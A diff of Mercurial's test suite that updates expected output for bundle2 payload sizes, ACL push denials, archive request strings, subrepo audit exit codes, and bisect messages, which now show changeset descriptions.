bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 24 bundle2-input-part: "check:updated-heads" supported @@ -764,7 +767,7 @@ list of changesets: ef1ea85a6374b77d6da9dcda9541f498f2d17df7 bundle2-output-bundle: "HG20", 7 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:bookmarks" 37 bytes payload bundle2-output-part: "check:phases" 24 bytes payload bundle2-output-part: "check:updated-heads" streamed payload @@ -773,7 +776,7 @@ bundle2-output-part: "bookmarks" 37 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:bookmarks" supported bundle2-input-part: total payload size 37 bundle2-input-part: "check:phases" supported @@ -853,7 +856,7 @@ list of changesets: ef1ea85a6374b77d6da9dcda9541f498f2d17df7 bundle2-output-bundle: "HG20", 7 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:bookmarks" 37 bytes payload bundle2-output-part: "check:phases" 24 bytes payload bundle2-output-part: "check:updated-heads" streamed payload @@ -862,7 +865,7 @@ bundle2-output-part: "bookmarks" 37 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:bookmarks" supported bundle2-input-part: total payload size 37 bundle2-input-part: "check:phases" supported @@ -897,6 +900,7 @@ bundle2-input-bundle: 7 parts total transaction abort! 
rollback completed + truncating cache/rbc-revs-v1 to 8 abort: acl: user "fred" denied on bookmark "moving-bookmark" (changeset "ef1ea85a6374b77d6da9dcda9541f498f2d17df7") no rollback information available 0:6675d58eff77 @@ -943,14 +947,14 @@ f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd 911600dab2ae7a9baff75958b84fe606851ce955 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 24 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 24 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 24 bundle2-input-part: "check:updated-heads" supported @@ -1029,14 +1033,14 @@ f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd 911600dab2ae7a9baff75958b84fe606851ce955 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 24 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 24 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 24 bundle2-input-part: "check:updated-heads" supported @@ -1069,6 +1073,7 @@ bundle2-input-bundle: 5 parts total transaction abort! 
rollback completed + truncating cache/rbc-revs-v1 to 8 abort: acl: user "wilma" not allowed on "quux/file.py" (changeset "911600dab2ae") no rollback information available 0:6675d58eff77 @@ -1112,14 +1117,14 @@ f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd 911600dab2ae7a9baff75958b84fe606851ce955 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 24 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 24 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 24 bundle2-input-part: "check:updated-heads" supported @@ -1190,14 +1195,14 @@ f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd 911600dab2ae7a9baff75958b84fe606851ce955 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 24 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 24 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 24 bundle2-input-part: "check:updated-heads" supported @@ -1279,14 +1284,14 @@ f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd 911600dab2ae7a9baff75958b84fe606851ce955 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes 
payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 24 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 24 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 24 bundle2-input-part: "check:updated-heads" supported @@ -1369,14 +1374,14 @@ f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd 911600dab2ae7a9baff75958b84fe606851ce955 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 24 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 24 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 24 bundle2-input-part: "check:updated-heads" supported @@ -1408,6 +1413,7 @@ bundle2-input-part: "phase-heads" supported bundle2-input-part: total payload size 24 bundle2-input-bundle: 5 parts total + truncating cache/rbc-revs-v1 to 8 updating the branch cache added 3 changesets with 3 changes to 3 files bundle2-output-bundle: "HG20", 1 parts total @@ -1455,14 +1461,14 @@ f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd 911600dab2ae7a9baff75958b84fe606851ce955 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: 
"check:phases" 24 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 24 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 24 bundle2-input-part: "check:updated-heads" supported @@ -1493,6 +1499,7 @@ bundle2-input-bundle: 5 parts total transaction abort! rollback completed + truncating cache/rbc-revs-v1 to 8 abort: acl: user "fred" denied on "foo/Bar/file.txt" (changeset "f9cafe1212c8") no rollback information available 0:6675d58eff77 @@ -1537,14 +1544,14 @@ f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd 911600dab2ae7a9baff75958b84fe606851ce955 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 24 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 24 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 24 bundle2-input-part: "check:updated-heads" supported @@ -1624,14 +1631,14 @@ f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd 911600dab2ae7a9baff75958b84fe606851ce955 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 24 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" 
(params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 24 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 24 bundle2-input-part: "check:updated-heads" supported @@ -1664,6 +1671,7 @@ bundle2-input-bundle: 5 parts total transaction abort! rollback completed + truncating cache/rbc-revs-v1 to 8 abort: acl: user "fred" denied on "foo/Bar/file.txt" (changeset "f9cafe1212c8") no rollback information available 0:6675d58eff77 @@ -1746,14 +1754,14 @@ 911600dab2ae7a9baff75958b84fe606851ce955 e8fc755d4d8217ee5b0c2bb41558c40d43b92c01 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 48 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 48 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 48 bundle2-input-part: "check:updated-heads" supported @@ -1833,14 +1841,14 @@ 911600dab2ae7a9baff75958b84fe606851ce955 e8fc755d4d8217ee5b0c2bb41558c40d43b92c01 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 48 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 48 bytes payload bundle2-input-bundle: 
with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 48 bundle2-input-part: "check:updated-heads" supported @@ -1911,14 +1919,14 @@ 911600dab2ae7a9baff75958b84fe606851ce955 e8fc755d4d8217ee5b0c2bb41558c40d43b92c01 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 48 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 48 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 48 bundle2-input-part: "check:updated-heads" supported @@ -1985,14 +1993,14 @@ 911600dab2ae7a9baff75958b84fe606851ce955 e8fc755d4d8217ee5b0c2bb41558c40d43b92c01 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 48 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 48 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 48 bundle2-input-part: "check:updated-heads" supported @@ -2053,14 +2061,14 @@ 911600dab2ae7a9baff75958b84fe606851ce955 
e8fc755d4d8217ee5b0c2bb41558c40d43b92c01 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 48 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 48 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 48 bundle2-input-part: "check:updated-heads" supported @@ -2145,14 +2153,14 @@ 911600dab2ae7a9baff75958b84fe606851ce955 e8fc755d4d8217ee5b0c2bb41558c40d43b92c01 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 48 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 48 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 48 bundle2-input-part: "check:updated-heads" supported @@ -2236,14 +2244,14 @@ 911600dab2ae7a9baff75958b84fe606851ce955 e8fc755d4d8217ee5b0c2bb41558c40d43b92c01 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 48 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload 
bundle2-output-part: "phase-heads" 48 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 48 bundle2-input-part: "check:updated-heads" supported @@ -2309,14 +2317,14 @@ 911600dab2ae7a9baff75958b84fe606851ce955 e8fc755d4d8217ee5b0c2bb41558c40d43b92c01 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 48 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 48 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 48 bundle2-input-part: "check:updated-heads" supported @@ -2394,14 +2402,14 @@ 911600dab2ae7a9baff75958b84fe606851ce955 e8fc755d4d8217ee5b0c2bb41558c40d43b92c01 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 48 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 48 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 48 bundle2-input-part: "check:updated-heads" supported diff --git 
a/tests/test-archive.t b/tests/test-archive.t --- a/tests/test-archive.t +++ b/tests/test-archive.t @@ -334,10 +334,10 @@ > pass > if len(sys.argv) <= 3: > node, archive = sys.argv[1:] - > requeststr = 'cmd=archive;node=%s;type=%s' % (node, archive) + > requeststr = 'cmd=archive&node=%s&type=%s' % (node, archive) > else: > node, archive, file = sys.argv[1:] - > requeststr = 'cmd=archive;node=%s;type=%s;file=%s' % (node, archive, file) + > requeststr = 'cmd=archive&node=%s&type=%s&file=%s' % (node, archive, file) > try: > stdout = sys.stdout.buffer > except AttributeError: diff --git a/tests/test-audit-subrepo.t b/tests/test-audit-subrepo.t --- a/tests/test-audit-subrepo.t +++ b/tests/test-audit-subrepo.t @@ -323,7 +323,7 @@ new changesets 7a2f0e59146f .hgsubstate: untracked file differs abort: untracked files in working directory differ from files in requested revision - [255] + [20] $ cat main5/.hg/hgrc | grep pwned [1] @@ -623,7 +623,7 @@ new changesets * (glob) .hgsubstate: untracked file differs abort: untracked files in working directory differ from files in requested revision - [255] + [20] $ ls "$FAKEHOME" a $ test -d "$FAKEHOME/.hg" @@ -652,7 +652,7 @@ new changesets * (glob) .hgsubstate: untracked file differs abort: untracked files in working directory differ from files in requested revision - [255] + [20] $ ls -A "$FAKEHOME" .hg a diff --git a/tests/test-backout.t b/tests/test-backout.t --- a/tests/test-backout.t +++ b/tests/test-backout.t @@ -718,6 +718,7 @@ ancestor path: foo (node f89532f44c247a0e993d63e3a734dd781ab04708) other path: foo (node f50039b486d6fa1a90ae51778388cad161f425ee) extra: ancestorlinknode = 91360952243723bd5b1138d5f26bd8c8564cb553 + extra: merged = yes $ mv .hg/merge/state2 .hg/merge/state2-moved $ hg debugmergestate -v no version 2 merge state diff --git a/tests/test-batching.py b/tests/test-batching.py --- a/tests/test-batching.py +++ b/tests/test-batching.py @@ -204,7 +204,7 @@ @wireprotov1peer.batchable def foo(self, one, 
two=None): - encargs = [ + encoded_args = [ ( b'one', mangle(one), @@ -214,9 +214,9 @@ mangle(two), ), ] - encresref = wireprotov1peer.future() - yield encargs, encresref - yield unmangle(encresref.value) + encoded_res_future = wireprotov1peer.future() + yield encoded_args, encoded_res_future + yield unmangle(encoded_res_future.value) @wireprotov1peer.batchable def bar(self, b, a): diff --git a/tests/test-bisect.t b/tests/test-bisect.t --- a/tests/test-bisect.t +++ b/tests/test-bisect.t @@ -200,25 +200,25 @@ update: (current) phases: 32 draft $ hg bisect -g 1 - Testing changeset 16:a2e6ea4973e9 (30 changesets remaining, ~4 tests) + Testing changeset 16:a2e6ea4973e9 "msg 16" (30 changesets remaining, ~4 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect -g - Testing changeset 23:5ec79163bff4 (15 changesets remaining, ~3 tests) + Testing changeset 23:5ec79163bff4 "msg 23" (15 changesets remaining, ~3 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved skip $ hg bisect -s - Testing changeset 24:10e0acd3809e (15 changesets remaining, ~3 tests) + Testing changeset 24:10e0acd3809e "msg 24" (15 changesets remaining, ~3 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect -g - Testing changeset 27:288867a866e9 (7 changesets remaining, ~2 tests) + Testing changeset 27:288867a866e9 "msg 27" (7 changesets remaining, ~2 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect -g - Testing changeset 29:b5bd63375ab9 (4 changesets remaining, ~2 tests) + Testing changeset 29:b5bd63375ab9 "msg 29" (4 changesets remaining, ~2 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect -b - Testing changeset 28:8e0c2264c8af (2 changesets remaining, ~1 tests) + Testing changeset 28:8e0c2264c8af "msg 28" (2 changesets remaining, ~1 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect -g The first 
bad revision is: @@ -234,7 +234,7 @@ $ hg bisect -b "0::3" $ hg bisect -s "13::16" $ hg bisect -g "26::tip" - Testing changeset 12:1941b52820a5 (23 changesets remaining, ~4 tests) + Testing changeset 12:1941b52820a5 "msg 12" (23 changesets remaining, ~4 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ cat .hg/bisect.state bad b99c7b9c8e11558adef3fad9af211c58d46f325b @@ -258,25 +258,25 @@ $ hg bisect -r $ hg bisect -b null $ hg bisect -g tip - Testing changeset 15:e7fa0811edb0 (32 changesets remaining, ~5 tests) + Testing changeset 15:e7fa0811edb0 "msg 15" (32 changesets remaining, ~5 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect -g - Testing changeset 7:03750880c6b5 (16 changesets remaining, ~4 tests) + Testing changeset 7:03750880c6b5 "msg 7" (16 changesets remaining, ~4 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved skip $ hg bisect -s - Testing changeset 6:a3d5c6fdf0d3 (16 changesets remaining, ~4 tests) + Testing changeset 6:a3d5c6fdf0d3 "msg 6" (16 changesets remaining, ~4 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect -g - Testing changeset 2:db07c04beaca (7 changesets remaining, ~2 tests) + Testing changeset 2:db07c04beaca "msg 2" (7 changesets remaining, ~2 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect -g - Testing changeset 0:b99c7b9c8e11 (3 changesets remaining, ~1 tests) + Testing changeset 0:b99c7b9c8e11 "msg 0" (3 changesets remaining, ~1 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect -b - Testing changeset 1:5cd978ea5149 (2 changesets remaining, ~1 tests) + Testing changeset 1:5cd978ea5149 "msg 1" (2 changesets remaining, ~1 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect -g The first good revision is: @@ -295,7 +295,7 @@ $ hg bisect -r $ hg bisect -g null $ hg bisect -bU tip - Testing 
changeset 15:e7fa0811edb0 (32 changesets remaining, ~5 tests) + Testing changeset 15:e7fa0811edb0 "msg 15" (32 changesets remaining, ~5 tests) $ hg id 5cd978ea5149 @@ -306,13 +306,13 @@ $ hg bisect -r $ hg bisect -b 4 $ hg bisect -g 0 - Testing changeset 2:db07c04beaca (4 changesets remaining, ~2 tests) + Testing changeset 2:db07c04beaca "msg 2" (4 changesets remaining, ~2 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect -s - Testing changeset 1:5cd978ea5149 (4 changesets remaining, ~2 tests) + Testing changeset 1:5cd978ea5149 "msg 1" (4 changesets remaining, ~2 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect -s - Testing changeset 3:b53bea5e2fcb (4 changesets remaining, ~2 tests) + Testing changeset 3:b53bea5e2fcb "msg 3" (4 changesets remaining, ~2 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect -s Due to skipped revisions, the first bad revision could be any of: @@ -343,7 +343,7 @@ $ hg bisect -r $ hg bisect -g 0 $ hg bisect -b 2 - Testing changeset 1:5cd978ea5149 (2 changesets remaining, ~1 tests) + Testing changeset 1:5cd978ea5149 "msg 1" (2 changesets remaining, ~1 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect -s Due to skipped revisions, the first bad revision could be any of: @@ -372,19 +372,19 @@ $ hg bisect -r $ hg bisect -b 6 $ hg bisect -g 0 - Testing changeset 3:b53bea5e2fcb (6 changesets remaining, ~2 tests) + Testing changeset 3:b53bea5e2fcb "msg 3" (6 changesets remaining, ~2 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect -s - Testing changeset 2:db07c04beaca (6 changesets remaining, ~2 tests) + Testing changeset 2:db07c04beaca "msg 2" (6 changesets remaining, ~2 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect -s - Testing changeset 4:9b2ba8336a65 (6 changesets remaining, ~2 tests) + Testing changeset 
4:9b2ba8336a65 "msg 4" (6 changesets remaining, ~2 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect -s - Testing changeset 1:5cd978ea5149 (6 changesets remaining, ~2 tests) + Testing changeset 1:5cd978ea5149 "msg 1" (6 changesets remaining, ~2 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect -s - Testing changeset 5:7874a09ea728 (6 changesets remaining, ~2 tests) + Testing changeset 5:7874a09ea728 "msg 5" (6 changesets remaining, ~2 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect -g The first bad revision is: @@ -473,17 +473,17 @@ $ hg bisect -r $ hg up -qr tip $ hg bisect --command "\"$PYTHON\" \"$TESTTMP/script.py\" and some parameters" - changeset 31:58c80a7c8a40: good + changeset 31:58c80a7c8a40 tip "msg 31": good abort: cannot bisect (no known bad revisions) [20] $ hg up -qr 0 $ hg bisect --command "\"$PYTHON\" \"$TESTTMP/script.py\" and some parameters" - changeset 0:b99c7b9c8e11: bad - changeset 15:e7fa0811edb0: good - changeset 7:03750880c6b5: good - changeset 3:b53bea5e2fcb: bad - changeset 5:7874a09ea728: bad - changeset 6:a3d5c6fdf0d3: good + changeset 0:b99c7b9c8e11 "msg 0": bad + changeset 15:e7fa0811edb0 "msg 15": good + changeset 7:03750880c6b5 "msg 7": good + changeset 3:b53bea5e2fcb "msg 3": bad + changeset 5:7874a09ea728 "msg 5": bad + changeset 6:a3d5c6fdf0d3 "msg 6": good The first good revision is: changeset: 6:a3d5c6fdf0d3 user: test @@ -510,13 +510,13 @@ $ hg bisect -r $ hg bisect --good tip --noupdate $ hg bisect --bad 0 --noupdate - Testing changeset 15:e7fa0811edb0 (31 changesets remaining, ~4 tests) + Testing changeset 15:e7fa0811edb0 "msg 15" (31 changesets remaining, ~4 tests) $ hg bisect --command "sh \"$TESTTMP/script.sh\" and some params" --noupdate - changeset 15:e7fa0811edb0: good - changeset 7:03750880c6b5: good - changeset 3:b53bea5e2fcb: bad - changeset 5:7874a09ea728: bad - changeset 6:a3d5c6fdf0d3: good + 
changeset 15:e7fa0811edb0 "msg 15": good + changeset 7:03750880c6b5 "msg 7": good + changeset 3:b53bea5e2fcb "msg 3": bad + changeset 5:7874a09ea728 "msg 5": bad + changeset 6:a3d5c6fdf0d3 "msg 6": good The first good revision is: changeset: 6:a3d5c6fdf0d3 user: test @@ -543,17 +543,17 @@ $ hg bisect -r $ hg up -qr tip $ hg bisect --command "sh \"$TESTTMP/script.sh\" and some params" - changeset 31:58c80a7c8a40: good + changeset 31:58c80a7c8a40 tip "msg 31": good abort: cannot bisect (no known bad revisions) [20] $ hg up -qr 0 $ hg bisect --command "sh \"$TESTTMP/script.sh\" and some params" - changeset 0:b99c7b9c8e11: bad - changeset 15:e7fa0811edb0: good - changeset 7:03750880c6b5: good - changeset 3:b53bea5e2fcb: bad - changeset 5:7874a09ea728: bad - changeset 6:a3d5c6fdf0d3: good + changeset 0:b99c7b9c8e11 "msg 0": bad + changeset 15:e7fa0811edb0 "msg 15": good + changeset 7:03750880c6b5 "msg 7": good + changeset 3:b53bea5e2fcb "msg 3": bad + changeset 5:7874a09ea728 "msg 5": bad + changeset 6:a3d5c6fdf0d3 "msg 6": good The first good revision is: changeset: 6:a3d5c6fdf0d3 user: test @@ -586,13 +586,13 @@ $ hg bisect --reset $ hg bisect --good 15 $ hg bisect --bad 30 - Testing changeset 22:06c7993750ce (15 changesets remaining, ~3 tests) + Testing changeset 22:06c7993750ce "msg 22" (15 changesets remaining, ~3 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect --command true - changeset 22:06c7993750ce: good - changeset 26:3efc6fd51aeb: good - changeset 28:8e0c2264c8af: good - changeset 29:b5bd63375ab9: good + changeset 22:06c7993750ce "msg 22": good + changeset 26:3efc6fd51aeb "msg 26": good + changeset 28:8e0c2264c8af "msg 28": good + changeset 29:b5bd63375ab9 "msg 29": good The first bad revision is: changeset: 30:ed2d2f24b11c tag: tip @@ -735,11 +735,11 @@ $ hg bisect --reset $ hg bisect --good . 
$ hg bisect --bad 25 - Testing changeset 28:8e0c2264c8af (6 changesets remaining, ~2 tests) + Testing changeset 28:8e0c2264c8af "msg 28" (6 changesets remaining, ~2 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect --command true - changeset 28:8e0c2264c8af: good - changeset 26:3efc6fd51aeb: good + changeset 28:8e0c2264c8af "msg 28": good + changeset 26:3efc6fd51aeb "msg 26": good The first good revision is: changeset: 26:3efc6fd51aeb user: test diff --git a/tests/test-bisect2.t b/tests/test-bisect2.t --- a/tests/test-bisect2.t +++ b/tests/test-bisect2.t @@ -252,7 +252,7 @@ $ hg bisect -r $ hg bisect -g 0 $ hg bisect -b 17 # -> update to rev 6 - Testing changeset 6:a214d5d3811a (15 changesets remaining, ~3 tests) + Testing changeset 6:a214d5d3811a "merge 4,5" (15 changesets remaining, ~3 tests) 0 files updated, 0 files merged, 2 files removed, 0 files unresolved $ hg log -q -r 'bisect(pruned)' 0:33b1f9bc8bc5 @@ -274,16 +274,16 @@ 16:609d82a7ebae $ hg log -q -r 'bisect(ignored)' $ hg bisect -g # -> update to rev 13 - Testing changeset 13:b0a32c86eb31 (9 changesets remaining, ~3 tests) + Testing changeset 13:b0a32c86eb31 "13" (9 changesets remaining, ~3 tests) 3 files updated, 0 files merged, 1 files removed, 0 files unresolved $ hg bisect -s # -> update to rev 10 - Testing changeset 10:429fcd26f52d (9 changesets remaining, ~3 tests) + Testing changeset 10:429fcd26f52d "merge 6,9" (9 changesets remaining, ~3 tests) 3 files updated, 0 files merged, 1 files removed, 0 files unresolved $ hg bisect -b # -> update to rev 8 - Testing changeset 8:dab8161ac8fc (3 changesets remaining, ~1 tests) + Testing changeset 8:dab8161ac8fc "8" (3 changesets remaining, ~1 tests) 2 files updated, 0 files merged, 1 files removed, 0 files unresolved 